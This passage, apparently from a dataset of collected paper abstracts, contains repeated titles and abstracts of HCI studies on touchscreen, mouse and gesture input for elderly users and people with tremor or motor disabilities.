evaluation of computer interactions that are based upon familiar real world tasks, which support multitouch interaction, involves few buttons and icons, no menus, no right-clicks or double-clicks and no dialogs. Using an example of an email client to test the principles of using "familiarity", the initial feedback was very encouraging, with 3 of the 4 participants being able to undertake some of the basic email tasks with no prior training and little or no help. The feedback has informed a number of refinements of the design principles, such as providing clearer affordance for visual objects. A full study is currently underway. --- paper_title: Elderly text-entry performance on touchscreens paper_content: Touchscreen devices have become increasingly popular. Yet they lack of tactile feedback and motor stability, making it difficult effectively typing on virtual keyboards. This is even worse for elderly users and their declining motor abilities, particularly hand tremor. In this paper we examine text-entry performance and typing patterns of elderly users on touch-based devices. Moreover, we analyze users' hand tremor profile and its relationship to typing behavior. Our main goal is to inform future designs of touchscreen keyboards for elderly people. To this end, we asked 15 users to enter text under two device conditions (mobile and tablet) and measured their performance, both speed- and accuracy-wise. Additionally, we thoroughly analyze different types of errors (insertions, substitutions, and omissions) looking at touch input features and their main causes. Results show that omissions are the most common error type, mainly due to cognitive errors, followed by substitutions and insertions. While tablet devices can compensate for about 9% of typing errors, omissions are similar across conditions. Measured hand tremor largely correlates with text-entry errors, suggesting that it should be approached to improve input accuracy. Finally, we assess the effect of simple touch models and provide implications to design. --- paper_title: Design and Development of a Mobile Medical Application for the Management of Chronic Diseases: Methods of Improved Data Input for Older People paper_content: The application of already widely available mobile phones would provide medical professionals with an additional possibility of outpatient care, which may reduce medical cost at the same time as providing support to elderly people suffering from chronic diseases, such as diabetes and hypertension. To facilitate this, it is essential to apply user centered development methodologies to counteract opposition due to the technological inexperience of the elderly. In this paper, we describe the design and development of a mobile medical application to help deal with chronic diseases in a home environment. The application is called MyMobileDoc and includes a graphical user interface for patients to enter medical data including blood pressure; blood glucose levels; etc. Although we are aware that sensor devices are being marketed to measure this data, subjective data, for example, pain intensity and contentment level must be manually input. We included 15 patients aged from 36 to 84 (mean age 65) and 4 nurses aged from 20 to 33 (mean age 26) in several of our user centered development cycles. We concentrated on three different possibilities for number input. We demonstrate the function of this interface, its applicability and the importance of patient education. Our aim is to stimulate incidental learning, enhance motivation, increase comprehension and thus acceptance. --- paper_title: Text entry on handheld computers by older users paper_content: Small pocket computers offer great potential in workplaces where mobility is needed to collect data or access reference information while carrying out tasks such as maintenance or customer support. This paper reports on three studies examining the hypothesis that data entry by older workers is easier when the pocket computer has a physical keyboard, albeit a small one, rather than a touchscreen keyboard. Using a counter-balanced, within-subjects design the accuracy and speed with which adults over 55 years of age could make or modify short text entries was measured for both kinds of pocket computer. The keyboard computer was the Hewlett Packard 360LX (HP), but the touch-screen computers varied across studies (experiment 1: Apple Newton™ and PalmPilot™; experiment 2: Philips Nino™; experiment 3: Casio E10™). All studies showed significant decrements in accuracy and speed when entering text via the touch-screen. Across studies, most participants preferred using the HP's small physical keyboard. Even after a... --- paper_title: A Study on the Icon Feedback Types of Small Touch Screen for the Elderly paper_content: Small touch screens are widely used in applications such as bank ATMs, point-of-sale terminals, ticket vending machines, facsimiles, and home automation in the daily life. It is intuition-oriented and easy to operate. There are a lot of elements that affect the small screen touch performance. One of the essential parts is icon feedback. However, to merely achieve beautiful icon feedback appearance and create interesting interaction experience, many interface designers ignore the real user needs. It is critical for them to trade off the icon feedback type associated with the different users needs in the touch interaction. This is especially important when the user capability is very limited. This paper described a pilot study for identifying factors that determine the icon feedback usability on small touch screen in four older adult Cognitrone groups since current research aimed mostly at general icon guidelines and recommendations and failed to consider and define the specific needs of small touch screen interfaces for the elderly. In this paper, we presented a concept from the focus on human necessity and use a cognitive assessment tool, which is, Cognitrone test, to measure older adult's attention and concentration capability and learn more about how to evaluate and design suitable small screen icon feedback types. Forty-five elder participants were participated. Each subject was asked to complete a battery of Cognitrone tests and divided into 4 groups. Each subject was also requested to perform a set of `continuous touch' usability tasks on small touch screen and comment on open-ended questions. Results are discussed with respect to the perceptual and cognitive factors that influence older adults in the use of icon feedback on small touch screen. It showed significant associations between icon feedback performance and factors of attention and concentration. However, this interrelation was much stronger for the Group 2 and Group 4, especially for Type B, Type C and Type G. Moreover, consistent with previous research, older participants were less sensitive and required longer time to adapt to the high-detailed icon feedback. These results are discussed in terms of icon feedback design strategies for interface designers. --- paper_title: Lowering elderly Japanese users’ resistance towards computers by using touchscreen technology paper_content: The standard qwerty keyboard is considered to be a major source of reluctance towards computer technology use by Japanese elderly, due to their limited experience with typewriters and the high cognitive demand involved in inputting Japanese characters. The touchscreen enables users to enter Japanese characters more directly and is expected to moderate this resistance. An e-mail terminal with a touchscreen was developed and compared with the same terminal using a standard keyboard and mouse. Computer attitudes and subjective evaluations of 32 older adults were measured. The results showed that the anxiety factor of computer attitudes declined significantly in the touchscreen condition. --- paper_title: Design pattern TRABING: touchscreen-based input technique for people affected by intention tremor paper_content: Tremor patients are frequently facing problems when interacting with IT systems and services. They do not reach the same levels of input efficiency and easily become unhappy with a technology they do not perceive as a general asset. Cases of Intention tremor show a significant comparative rise in inaccurate movement towards a real button or virtual buttons on touch screens, as this particular tremor increases its symptoms when approaching a desired physical target. People suffering from this specific tremor have been identified as the target group. This group has been closely investigated and thus, a new input procedure has been developed which may be used on standard touch screens. The new technique enables users, accordingly tremor patients, to fully operate IT-based systems and therefore possess full control over input. Deviations caused by the tremor are compensated with a continuous movement instead of a single targeted move which remains the most difficult task to the user. Also, the screen surface will present a frictional resistance, which significantly hinders tremor symptoms. Input can be identified by the computer system with high accuracy, by means of special heuristics, which support barrier free access beyond the target group. --- paper_title: Elderly User Evaluation of Mobile Touchscreen Interactions paper_content: Smartphones with touchscreen-based interfaces are increasingly used by non-technical groups including the elderly. However, application developers have little understanding of how senior users interact with their products and of how to design senior-friendly interfaces. As an initial study to assess standard mobile touchscreen interfaces for the elderly, we conducted performance measurements and observational evaluations of 20 elderly participants. The tasks included performing basic gestures such as taps, drags, and pinching motions and using basic interactive components such as software keyboards and photo viewers. We found that mobile touchscreens were generally easy for the elderly to use and a week's experience generally improved their proficiency. However, careful observations identified several typical problems that should be addressed in future interfaces. We discuss the implications of our experiments, seeking to provide informal guidelines for application developers to design better interfaces for elderly people. --- paper_title: Comparison between single-touch and multi-touch interaction for older people paper_content: This paper describes a study exploring the multi-touch interaction for older adults. The aim of this experiment was to check the relevance of this interaction versus single-touch interaction to realize object manipulation tasks: move, rotate and zoom. For each task, the user had to manipulate a rectangle and superimpose it to a picture frame. Our study shows that adults and principally older adults had more difficulties to realize these tasks for multi-touch interaction than for single-touch interaction. --- paper_title: Effect of computer mouse gain and visual demand on mouse clicking performance and muscle activation in a young and elderly group of experienced computer users. paper_content: The present study evaluated the specific effects of motor demand and visual demands on the ability to control motor output in terms of performance and muscle activation. Young and elderly subjects performed multidirectional pointing tasks with the computer mouse. Three levels of mouse gain and three levels of target size were used. All subjects demonstrated a reduced working speed and hit rate at the highest mouse gain (1:8) when the target size was small. The young group had an optimum at mouse gain 1:4. The elderly group was most sensitive to the combination of high mouse gain and small targets and thus, this age group should avoid this combination. Decreasing target sizes (i.e. increasing visual demand) reduced performance in both groups despite that motor demand was maintained constant. Therefore, it is recommended to avoid small screen objects and letters. Forearm muscle activity was only to a minor degree influenced by mouse gain (and target sizes) indicating that stability of the forearm/hand is of significance during computer mouse control. The study has implications for ergonomists, pointing device manufacturers and software developers. --- paper_title: Investigation of Input Devices for the Age-differentiated Design of Human-Computer Interaction: paper_content: Demographic change demands new concepts for the support of computer work by aging employees. In particular, computer interaction presents a barrier due to a lack of experience and age-specific changes in performance. This article presents a study in which different input devices (mouse, touch screen and eye-gaze input) were analyzed regarding their usability and according to age diversity. Furthermore, different Hybrid Interfaces that combine eye-gaze input with additional input devices were investigated. --- paper_title: A Study of Pointing Performance of Elderly Users on Smartphones paper_content: The number of global smartphone users is rapidly increasing. However, the proportion of elderly persons using smartphones is lower than that of other age groups because they feel it is difficult to use touch screens. There have only been a few studies about usability and elderly smartphone users or designs for them. Based on this background, we studied the pointing action of elderly users, which is a basic skill required to use touch screens on smartphones. We reviewed previous works to determine specific research methods and categorized them into three groups: (a) effect of target size and spacing on touch screen pointing performance, (b) effect of age on pointing performance, and (c) feedback of touch screens. To investigate the touch screen pointing performance of elderly, we conducted two experiments. In the first experiment, 3 target sizes (5 mm, 8 mm, and 12 mm) and 2 target spacings (1 mm, 3 mm) were evaluated. Adding to that, we analyzed whether touch screen pointing performance is dependent on th... --- paper_title: Performance and muscle activity during computer mouse tasks in young and elderly adults paper_content: The influence of age on performance and muscle activity was studied during computer mouse tasks designed to induce high demands on motor control. Eight young (mean age 25 years) and nine elderly (mean age 63 years) women participated. When the speed was self-determined, the elderly subjects performed 13%-18% slower than did the young. When speed was predefined, the error rate was higher in the elderly subjects than in the young ones (medium precision 7.8% compared to 2.5%, high precision 16.5% compared to 7.9%, respectively). The highest error rate was found for double-clicking (32.9% compared to 13.5%, respectively). The reduced performance in the elderly subjects was hypothesised to be a combined effect of deteriorated proprioception, increased motor unit size, and changes in the central nervous system. Electrical activity (EMG) was recorded from the forearm, shoulder and neck muscles. Higher levels of EMG activity were found in the elderly compared to the young. A likely explanation is that the impaired motor control necessitated an increased muscle activity. The highest levels of EMG activity and lack of EMG gaps were found for the forearm extensor muscles, especially the extensor digitorum muscle (mean EMG activity 10.4% compared to 8.1% of maximal electrical activity, EMGmax) whereas lower EMG activity levels were found for the shoulder region (e.g. right trapezius muscle mean EMG 2.8% compared to 1.1% EMGmax, respectively). The latter was possibly due to a relieving effect of the forearm support. Differences in muscle activity among the tasks were found, however they were minor for the shoulder and neck muscles. Consideration of the demands on motor control when designing user interfaces is recommended, to the benefit of both the young and the elderly. --- paper_title: Evaluating swabbing: a touchscreen input method for elderly users with tremor paper_content: Elderly users suffering from hand tremor have difficulties interacting with touchscreens because of finger oscillation. It has been previously observed that sliding one's finger across the screen may help reduce this oscillation. In this work, we empirically confirm this advantage by (1) measuring finger oscillation during different actions and (2) comparing error rate and user satisfaction between traditional tapping and swabbing in which the user slides his finger towards a target on a screen edge to select it. We found that oscillation is generally reduced during sliding. Also, compared to tapping, swabbing resulted in improved error rates and user satisfaction. We believe that swabbing will make touchscreens more accessible to senior users with tremor. --- paper_title: Age-related differences in performance with touchscreens compared to traditional mouse input paper_content: Despite the apparent popularity of touchscreens for older adults, little is known about the psychomotor performance of these devices. We compared performance between older adults and younger adults on four desktop and touchscreen tasks: pointing, dragging, crossing and steering. On the touchscreen, we also examined pinch-to-zoom. Our results show that while older adults were significantly slower than younger adults in general, the touchscreen reduced this performance gap relative to the desktop and mouse. Indeed, the touchscreen resulted in a significant movement time reduction of 35% over the mouse for older adults, compared to only 16% for younger adults. Error rates also decreased. --- paper_title: Gestural interfaces for elderly users: Help or hindrance paper_content: In this paper we investigate whether finger gesture input is a suitable input method, especially for older users (60+) with respect to age-related changes in sensory, cognitive and motor abilities. We present a study in which we compare a group of older users to a younger user group on a set of 42 different finger gestures on measures of speed and accuracy. The size and the complexity of the gestures varied systematically in order to find out how these factors interact with age on gesture performance. The results showed that older users are a little slower, but not necessarily less accurate than younger users, even on smaller screen sizes, and across different levels of gesture complexity. This indicates that gesture-based interaction could be a suitable input method for older adults. At least not a hindrance - maybe even a help. --- paper_title: Elderly text-entry performance on touchscreens paper_content: Touchscreen devices have become increasingly popular. Yet they lack of tactile feedback and motor stability, making it difficult effectively typing on virtual keyboards. This is even worse for elderly users and their declining motor abilities, particularly hand tremor. In this paper we examine text-entry performance and typing patterns of elderly users on touch-based devices. Moreover, we analyze users' hand tremor profile and its relationship to typing behavior. Our main goal is to inform future designs of touchscreen keyboards for elderly people. To this end, we asked 15 users to enter text under two device conditions (mobile and tablet) and measured their performance, both speed- and accuracy-wise. Additionally, we thoroughly analyze different types of errors (insertions, substitutions, and omissions) looking at touch input features and their main causes. Results show that omissions are the most common error type, mainly due to cognitive errors, followed by substitutions and insertions. While tablet devices can compensate for about 9% of typing errors, omissions are similar across conditions. Measured hand tremor largely correlates with text-entry errors, suggesting that it should be approached to improve input accuracy. Finally, we assess the effect of simple touch models and provide implications to design. --- paper_title: Developing a Touchscreen-based Domotic Tool for Users with Motor Disabilities paper_content: Domotics refers to the set of informatics and electronics systems able to automate, control and monitor a home. Accessibility can be defined as the users' potential for interaction, regardless of their technical, cognitive or physical abilities. Domotics usually focuses on the "intelligent home" concept, without explicitly considering the benefits that accessible services can provide for people with special needs. The paper presents the developing process of a domotic tool prototype that allows users with motor disabilities to control the surrounding artifacts of their home through the use of a touch screen-based mobile device. The prototype was developed using a user-centered design process, which explicitly includes usability and accessibility issues. The validation of the tool was conducted through analysis that involved (1) usability specialists, (2) physical therapists, and (3) real users from Teleton Foundation, a Chilean institution focused on rehabilitation and integration into society of children and adolescents who have motor disabilities. --- paper_title: Exploring the accessibility and appeal of surface computing for older adult health care support paper_content: This paper examines accessibility issues of surface computing with older adults and explores the appeal of surface computing for health care support. We present results from a study involving 20 older adults (age 60 to 88) performing gesture-based interactions on a multitouch surface. Older adults were able to successfully perform all actions on the surface computer, but some gestures that required two fingers (resize) and fine motor movement (rotate) were problematic. Ratings for ease of use and ease of performing each action as well as time required to figure out an action were similar to that of younger adults. Older adults reported that the surface computer was less intimidating, less frustrating, and less overwhelming than a traditional computer. The idea of using a surface computer for health care support was well-received by participants. We conclude with a discussion of design issues involving surface computing for older adults and use of this technology for health care. --- paper_title: Indirect mappings of multi-touch input using one and two hands paper_content: Touchpad and touchscreen interaction using multiple fingers is emerging as a valuable form of high-degree-of-freedom input. While bimanual interaction has been extensively studied, touchpad interaction using multiple fingers of the same hand is not yet well understood. We describe two experiments on user perception and control of multi-touch interaction using one and two hands. The first experiment addresses how to maintain perceptual-motor compatibility in multi-touch interaction, while the second measures the separability of control of degrees-of-freedom in the hands and fingers. Results indicate that two-touch interaction using two hands is compatible with control of two points, while twotouch interaction using one hand is compatible with control of a position, orientation, and hand-span. A slight advantage is found for two hands in separating the control of two positions. --- paper_title: Hand Grip Strength on a Large PDA: Holding While Reading Is Different from a Functional Task paper_content: several studies have been done measuring preferred hand grip strength, but none of them has measured preferred hand strength on a PDA or similar device when it is held and used. We measured dominant hand strength in two conditions similar to real PDA use, resting fore-arms on a table and holding the PDA without table support. We found that adult participants squeeze the device with their preferred hand significantly more than with their nonpreferred hand while holding. In addition, we examined users' hand strength while they were tapping on the back of the device with their right and left index fingers. Our results were different than expected from previous studies, as we found that there was no significant difference in dominant and non dominant hand strength during back tapping. Also participants' non preferred hand strength was not significantly different with their preferred hand when they tap on the back of the device. The results show that in such functional use during tapping, the dominant and non-dominant hands are used similarly which will contribute to future designs for PDAs and their interfaces. Our results may also contribute to design for more comfortable devices for users with hand disabilities. --- paper_title: Effect of touch screen button size and spacing on touch characteristics of users with and without disabilities. paper_content: OBJECTIVE ::: The aim of this study was to investigate the effect of button size and spacing on touch characteristics (forces, impulses, and dwell times) during a digit entry touch screen task. A secondary objective was to investigate the effect of disability on touch characteristics. ::: ::: ::: BACKGROUND ::: Touch screens are common in public settings and workplaces. Although research has examined the effect of button size and spacing on performance, the effect on touch characteristics is unknown. ::: ::: ::: METHOD ::: A total of 52 participants (n = 23, fine motor control disability; n = 14, gross motor control disability; n = 15, no disability) completed a digit entry task. Button sizes varied from 10 mm to 30 mm, and button spacing was 1 mm or 3 mm. ::: ::: ::: RESULTS ::: Touch characteristics were significantly affected by button size. The exerted peak forces increased 17% between the largest and the smallest buttons, whereas impulses decreased 28%. Compared with the fine motor and nondisabled groups, the gross motor group had greater impulses (98% and 167%, respectively) and dwell times (60% and 129%, respectively). Peak forces were similar for all groups. ::: ::: ::: CONCLUSION ::: Button size but not spacing influenced touch characteristics during a digit entry task. The gross motor group had significantly greater dwell times and impulses than did the fine motor and nondisabled groups. ::: ::: ::: APPLICATION ::: Research on touch characteristics, in conjunction with that on user performance, can be used to guide human computer interface design strategies to improve accessibility of touch screen interfaces. Further research is needed to evaluate the effect of the exerted peak forces and impulses on user performance and fatigue. --- paper_title: Slipping and drifting: using older users to uncover pen-based target acquisition difficulties paper_content: This paper presents the results of a study to gather information on the underlying causes of pen -based target acquisition difficulty. In order to observe both simple and complex interaction, two tasks (menu and Fitts' tapping) were used. Thirty-six participants across three age groups (18-54, 54-69, and 70-85) were included to draw out both general shortcomings of targeting, and those difficulties unique to older users. Three primary sources of target acquisition difficulty were identified: slipping off the target, drifting unexpectedly from one menu to the next, and missing a menu selection by selecting the top edge of the item below. Based on these difficulties, we then evolved several designs for improving pen-based target acquisition. An additional finding was that including older users as participants allowed us to uncover pen-interaction deficiencies that we would likely have missed otherwise. --- paper_title: Use of force plate instrumentation to assess kinetic variables during touch screen use paper_content: Touch screens are becoming ubiquitous technology, allowing for enhanced speed and convenience of user interfaces. To date, the majority of touch screen usability studies have focused on timing and accuracy of young, healthy individuals. This information alone may not be sufficient to improve accessibility and usability of touch screens. Kinetic data (e.g. force, impulse, and direction) may provide valuable information regarding human performance during touch screen use. Since kinetic information cannot be measured with a touch screen alone, touch screen-force plate instrumentation, software, and methodology were developed. Individuals with motor control disabilities (Cerebral Palsy and Multiple Sclerosis), as well as gender- and age-matched non-disabled participants, completed a pilot reciprocal tapping task to evaluate the validity of this new instrumentation to quantify touch characteristics. Results indicate that the instrumentation was able to successfully evaluate performance and kinetic characteristics. The kinetic information measured by the new instrumentation provides important insight into touch characteristics which may lead to improved usability and accessibility of touch screens. --- paper_title: Lowering elderly Japanese users’ resistance towards computers by using touchscreen technology paper_content: The standard qwerty keyboard is considered to be a major source of reluctance towards computer technology use by Japanese elderly, due to their limited experience with typewriters and the high cognitive demand involved in inputting Japanese characters. The touchscreen enables users to enter Japanese characters more directly and is expected to moderate this resistance. An e-mail terminal with a touchscreen was developed and compared with the same terminal using a standard keyboard and mouse. Computer attitudes and subjective evaluations of 32 older adults were measured. The results showed that the anxiety factor of computer attitudes declined significantly in the touchscreen condition. --- paper_title: Design pattern TRABING: touchscreen-based input technique for people affected by intention tremor paper_content: Tremor patients are frequently facing problems when interacting with IT systems and services. They do not reach the same levels of input efficiency and easily become unhappy with a technology they do not perceive as a general asset. Cases of Intention tremor show a significant comparative rise in inaccurate movement towards a real button or virtual buttons on touch screens, as this particular tremor increases its symptoms when approaching a desired physical target. People suffering from this specific tremor have been identified as the target group. This group has been closely investigated and thus, a new input procedure has been developed which may be used on standard touch screens. The new technique enables users, accordingly tremor patients, to fully operate IT-based systems and therefore possess full control over input. Deviations caused by the tremor are compensated with a continuous movement instead of a single targeted move which remains the most difficult task to the user. Also, the screen surface will present a frictional resistance, which significantly hinders tremor symptoms. Input can be identified by the computer system with high accuracy, by means of special heuristics, which support barrier free access beyond the target group. --- paper_title: Elderly User Evaluation of Mobile Touchscreen Interactions paper_content: Smartphones with touchscreen-based interfaces are increasingly used by non-technical groups including the elderly. However, application developers have little understanding of how senior users interact with their products and of how to design senior-friendly interfaces. As an initial study to assess standard mobile touchscreen interfaces for the elderly, we conducted performance measurements and observational evaluations of 20 elderly participants. The tasks included performing basic gestures such as taps, drags, and pinching motions and using basic interactive components such as software keyboards and photo viewers. We found that mobile touchscreens were generally easy for the elderly to use and a week's experience generally improved their proficiency. However, careful observations identified several typical problems that should be addressed in future interfaces. We discuss the implications of our experiments, seeking to provide informal guidelines for application developers to design better interfaces for elderly people. --- paper_title: Use of Computer Input Devices by Older Adults paper_content: A sample of 85 seniors was given experience (10 trials) playing two computer tasks using four input devices (touch screen, enlarged mouse [EZ Ball], mouse, and touch pad). Performance measures assessed both accuracy and time to complete components of the game for these devices. As well, participants completed a survey where they evaluated each of the devices. Seniors also completed a series of measures assessing visual memory, visual perception, motor coordination, and motor dexterity. Overall, previous experience with computers had a significant impact on the type of device that yielded the highest accuracy and speed performance, with different devices yielding better performance for novices versus experienced computer users. Regression analyses indicated that the mouse was the most demanding device in terms of the cognitive and motor-demand measures. Discussion centers on the relative benefits and perceptions regarding these devices among senior populations. --- paper_title: Effect of sitting or standing on touch screen performance and touch characteristics. paper_content: OBJECTIVE ::: The aim of this study was to evaluate the effect of sitting and standing on performance and touch characteristics during a digit entry touch screen task in individuals with and without motor-control disabilities. ::: ::: ::: BACKGROUND ::: Previously, researchers of touch screen design have not considered the effect of posture (sitting vs. standing) on touch screen performance (accuracy and timing) and touch characteristics (force and impulse). ::: ::: ::: METHOD ::: Participants with motor-control disabilities (n = 15) and without (n = 15) completed a four-digit touch screen number entry task in both sitting and standing postures. Button sizes varied from 10 mm to 30 mm (5-mm increments), and button gap was 3 mm or 5 mm. ::: ::: ::: RESULTS ::: Participants had more misses and took longer to complete the task during standing for smaller button sizes (< 20 mm). At larger button sizes, performance was similar for both sitting and standing. In general, misses, time to complete task, and touch characteristics were increased for standing. Although disability affected performance (misses and timing), similar trends were observed for both groups across posture and button size. ::: ::: ::: CONCLUSION ::: Standing affects performance at smaller button sizes (< 20 mm). For participants with and without motor-control disabilities, standing led to greater exerted force and impulse. ::: ::: ::: APPLICATION ::: Along with interface design considerations, environmental conditions should also be considered to improve touch screen accessibility and usability. --- paper_title: Investigating familiar interactions to help older adults learn computer applications more easily paper_content: Many older adults wish to gain competence in using a computer, but many application interfaces are perceived as complex and difficult to use, deterring potential users from investing the time to learn them. Hence, this study looks at the potential of 'familiar' interface design which builds upon users' knowledge of real world interactions, and applies existing skills to a new domain. Tools are provided in the form of familiar visual objects, and manipulated like real-world counterparts, rather than with buttons, icons and menus found in classic WIMP interfaces. ::: ::: This paper describes the formative evaluation of computer interactions that are based upon familiar real world tasks, which support multitouch interaction, involves few buttons and icons, no menus, no right-clicks or double-clicks and no dialogs. Using an example of an email client to test the principles of using "familiarity", the initial feedback was very encouraging, with 3 of the 4 participants being able to undertake some of the basic email tasks with no prior training and little or no help. The feedback has informed a number of refinements of the design principles, such as providing clearer affordance for visual objects. A full study is currently underway. --- paper_title: Design and Development of a Mobile Medical Application for the Management of Chronic Diseases: Methods of Improved Data Input for Older People paper_content: The application of already widely available mobile phones would provide medical professionals with an additional possibility of outpatient care, which may reduce medical cost at the same time as providing support to elderly people suffering from chronic diseases, such as diabetes and hypertension. To facilitate this, it is essential to apply user centered development methodologies to counteract opposition due to the technological inexperience of the elderly. In this paper, we describe the design and development of a mobile medical application to help deal with chronic diseases in a home environment. The application is called MyMobileDoc and includes a graphical user interface for patients to enter medical data including blood pressure; blood glucose levels; etc. Although we are aware that sensor devices are being marketed to measure this data, subjective data, for example, pain intensity and contentment level must be manually input. We included 15 patients aged from 36 to 84 (mean age 65) and 4 nurses aged from 20 to 33 (mean age 26) in several of our user centered development cycles. We concentrated on three different possibilities for number input. We demonstrate the function of this interface, its applicability and the importance of patient education. Our aim is to stimulate incidental learning, enhance motivation, increase comprehension and thus acceptance. --- paper_title: Age-related differences in performance with touchscreens compared to traditional mouse input paper_content: Despite the apparent popularity of touchscreens for older adults, little is known about the psychomotor performance of these devices. We compared performance between older adults and younger adults on four desktop and touchscreen tasks: pointing, dragging, crossing and steering. On the touchscreen, we also examined pinch-to-zoom. Our results show that while older adults were significantly slower than younger adults in general, the touchscreen reduced this performance gap relative to the desktop and mouse. Indeed, the touchscreen resulted in a significant movement time reduction of 35% over the mouse for older adults, compared to only 16% for younger adults. Error rates also decreased. --- paper_title: The elderly interacting with a digital agenda through an RFID pen and a touch screen paper_content: Ambient Assisted Living (AAL) aims to enhance quality of life of elder and impaired people. Thanks to the advances in Information and Communication Technologies (ICT), it is now possible not only to support new home services to improve their quality of life, but also to provide them with more natural, simple and multimodal interaction styles. It enables introducing new better-suited interaction styles for performing tasks according to user need, abilities and the usage conditions. In this paper, a digital agenda application is described and tested by a group of elderly users. This customized personal agenda allows elders to create agenda entries, to view calendar entries and a person's telephone without typing any letter or number. Through observation and the capture of data we studied how six participants (ages from 66 to 74) interacted with the personal agenda through a touch screen and an RFID-based interface. The RFID interaction consisted of a sheet-like physical object' the RFID board', and a pen-like object 'the IDBlue pen' that the users used to choose the desired option in the board. Beside the users' satisfaction, interesting results have been found that make us aware of valuable information to enhance their interaction with the digital world, as well as, their quality of life. Moreover, it is shown how a pen-like object and a sheet-like one can be used by the elderly to interact with the digital world. --- paper_title: Elderly text-entry performance on touchscreens paper_content: Touchscreen devices have become increasingly popular. Yet they lack of tactile feedback and motor stability, making it difficult effectively typing on virtual keyboards. This is even worse for elderly users and their declining motor abilities, particularly hand tremor. In this paper we examine text-entry performance and typing patterns of elderly users on touch-based devices. Moreover, we analyze users' hand tremor profile and its relationship to typing behavior. Our main goal is to inform future designs of touchscreen keyboards for elderly people. To this end, we asked 15 users to enter text under two device conditions (mobile and tablet) and measured their performance, both speed- and accuracy-wise. Additionally, we thoroughly analyze different types of errors (insertions, substitutions, and omissions) looking at touch input features and their main causes. Results show that omissions are the most common error type, mainly due to cognitive errors, followed by substitutions and insertions. While tablet devices can compensate for about 9% of typing errors, omissions are similar across conditions. Measured hand tremor largely correlates with text-entry errors, suggesting that it should be approached to improve input accuracy. Finally, we assess the effect of simple touch models and provide implications to design. --- paper_title: Exploring the accessibility and appeal of surface computing for older adult health care support paper_content: This paper examines accessibility issues of surface computing with older adults and explores the appeal of surface computing for health care support. We present results from a study involving 20 older adults (age 60 to 88) performing gesture-based interactions on a multitouch surface. Older adults were able to successfully perform all actions on the surface computer, but some gestures that required two fingers (resize) and fine motor movement (rotate) were problematic. Ratings for ease of use and ease of performing each action as well as time required to figure out an action were similar to that of younger adults. Older adults reported that the surface computer was less intimidating, less frustrating, and less overwhelming than a traditional computer. The idea of using a surface computer for health care support was well-received by participants. We conclude with a discussion of design issues involving surface computing for older adults and use of this technology for health care. --- paper_title: Lowering elderly Japanese users’ resistance towards computers by using touchscreen technology paper_content: The standard qwerty keyboard is considered to be a major source of reluctance towards computer technology use by Japanese elderly, due to their limited experience with typewriters and the high cognitive demand involved in inputting Japanese characters. The touchscreen enables users to enter Japanese characters more directly and is expected to moderate this resistance. An e-mail terminal with a touchscreen was developed and compared with the same terminal using a standard keyboard and mouse. Computer attitudes and subjective evaluations of 32 older adults were measured. The results showed that the anxiety factor of computer attitudes declined significantly in the touchscreen condition. --- paper_title: Design pattern TRABING: touchscreen-based input technique for people affected by intention tremor paper_content: Tremor patients are frequently facing problems when interacting with IT systems and services. They do not reach the same levels of input efficiency and easily become unhappy with a technology they do not perceive as a general asset. Cases of Intention tremor show a significant comparative rise in inaccurate movement towards a real button or virtual buttons on touch screens, as this particular tremor increases its symptoms when approaching a desired physical target. People suffering from this specific tremor have been identified as the target group. This group has been closely investigated and thus, a new input procedure has been developed which may be used on standard touch screens. The new technique enables users, accordingly tremor patients, to fully operate IT-based systems and therefore possess full control over input. Deviations caused by the tremor are compensated with a continuous movement instead of a single targeted move which remains the most difficult task to the user. Also, the screen surface will present a frictional resistance, which significantly hinders tremor symptoms. Input can be identified by the computer system with high accuracy, by means of special heuristics, which support barrier free access beyond the target group. --- paper_title: Investigating familiar interactions to help older adults learn computer applications more easily paper_content: Many older adults wish to gain competence in using a computer, but many application interfaces are perceived as complex and difficult to use, deterring potential users from investing the time to learn them. Hence, this study looks at the potential of 'familiar' interface design which builds upon users' knowledge of real world interactions, and applies existing skills to a new domain. Tools are provided in the form of familiar visual objects, and manipulated like real-world counterparts, rather than with buttons, icons and menus found in classic WIMP interfaces. ::: ::: This paper describes the formative evaluation of computer interactions that are based upon familiar real world tasks, which support multitouch interaction, involves few buttons and icons, no menus, no right-clicks or double-clicks and no dialogs. Using an example of an email client to test the principles of using "familiarity", the initial feedback was very encouraging, with 3 of the 4 participants being able to undertake some of the basic email tasks with no prior training and little or no help. The feedback has informed a number of refinements of the design principles, such as providing clearer affordance for visual objects. A full study is currently underway. --- paper_title: Age-related differences in performance with touchscreens compared to traditional mouse input paper_content: Despite the apparent popularity of touchscreens for older adults, little is known about the psychomotor performance of these devices. We compared performance between older adults and younger adults on four desktop and touchscreen tasks: pointing, dragging, crossing and steering. On the touchscreen, we also examined pinch-to-zoom. Our results show that while older adults were significantly slower than younger adults in general, the touchscreen reduced this performance gap relative to the desktop and mouse. Indeed, the touchscreen resulted in a significant movement time reduction of 35% over the mouse for older adults, compared to only 16% for younger adults. Error rates also decreased. --- paper_title: The elderly interacting with a digital agenda through an RFID pen and a touch screen paper_content: Ambient Assisted Living (AAL) aims to enhance quality of life of elder and impaired people. Thanks to the advances in Information and Communication Technologies (ICT), it is now possible not only to support new home services to improve their quality of life, but also to provide them with more natural, simple and multimodal interaction styles. It enables introducing new better-suited interaction styles for performing tasks according to user need, abilities and the usage conditions. In this paper, a digital agenda application is described and tested by a group of elderly users. This customized personal agenda allows elders to create agenda entries, to view calendar entries and a person's telephone without typing any letter or number. Through observation and the capture of data we studied how six participants (ages from 66 to 74) interacted with the personal agenda through a touch screen and an RFID-based interface. The RFID interaction consisted of a sheet-like physical object' the RFID board', and a pen-like object 'the IDBlue pen' that the users used to choose the desired option in the board. Beside the users' satisfaction, interesting results have been found that make us aware of valuable information to enhance their interaction with the digital world, as well as, their quality of life. Moreover, it is shown how a pen-like object and a sheet-like one can be used by the elderly to interact with the digital world. --- paper_title: Gestural interfaces for elderly users: Help or hindrance paper_content: In this paper we investigate whether finger gesture input is a suitable input method, especially for older users (60+) with respect to age-related changes in sensory, cognitive and motor abilities. We present a study in which we compare a group of older users to a younger user group on a set of 42 different finger gestures on measures of speed and accuracy. The size and the complexity of the gestures varied systematically in order to find out how these factors interact with age on gesture performance. The results showed that older users are a little slower, but not necessarily less accurate than younger users, even on smaller screen sizes, and across different levels of gesture complexity. This indicates that gesture-based interaction could be a suitable input method for older adults. At least not a hindrance - maybe even a help. --- paper_title: Elderly text-entry performance on touchscreens paper_content: Touchscreen devices have become increasingly popular. Yet they lack of tactile feedback and motor stability, making it difficult effectively typing on virtual keyboards. This is even worse for elderly users and their declining motor abilities, particularly hand tremor. In this paper we examine text-entry performance and typing patterns of elderly users on touch-based devices. 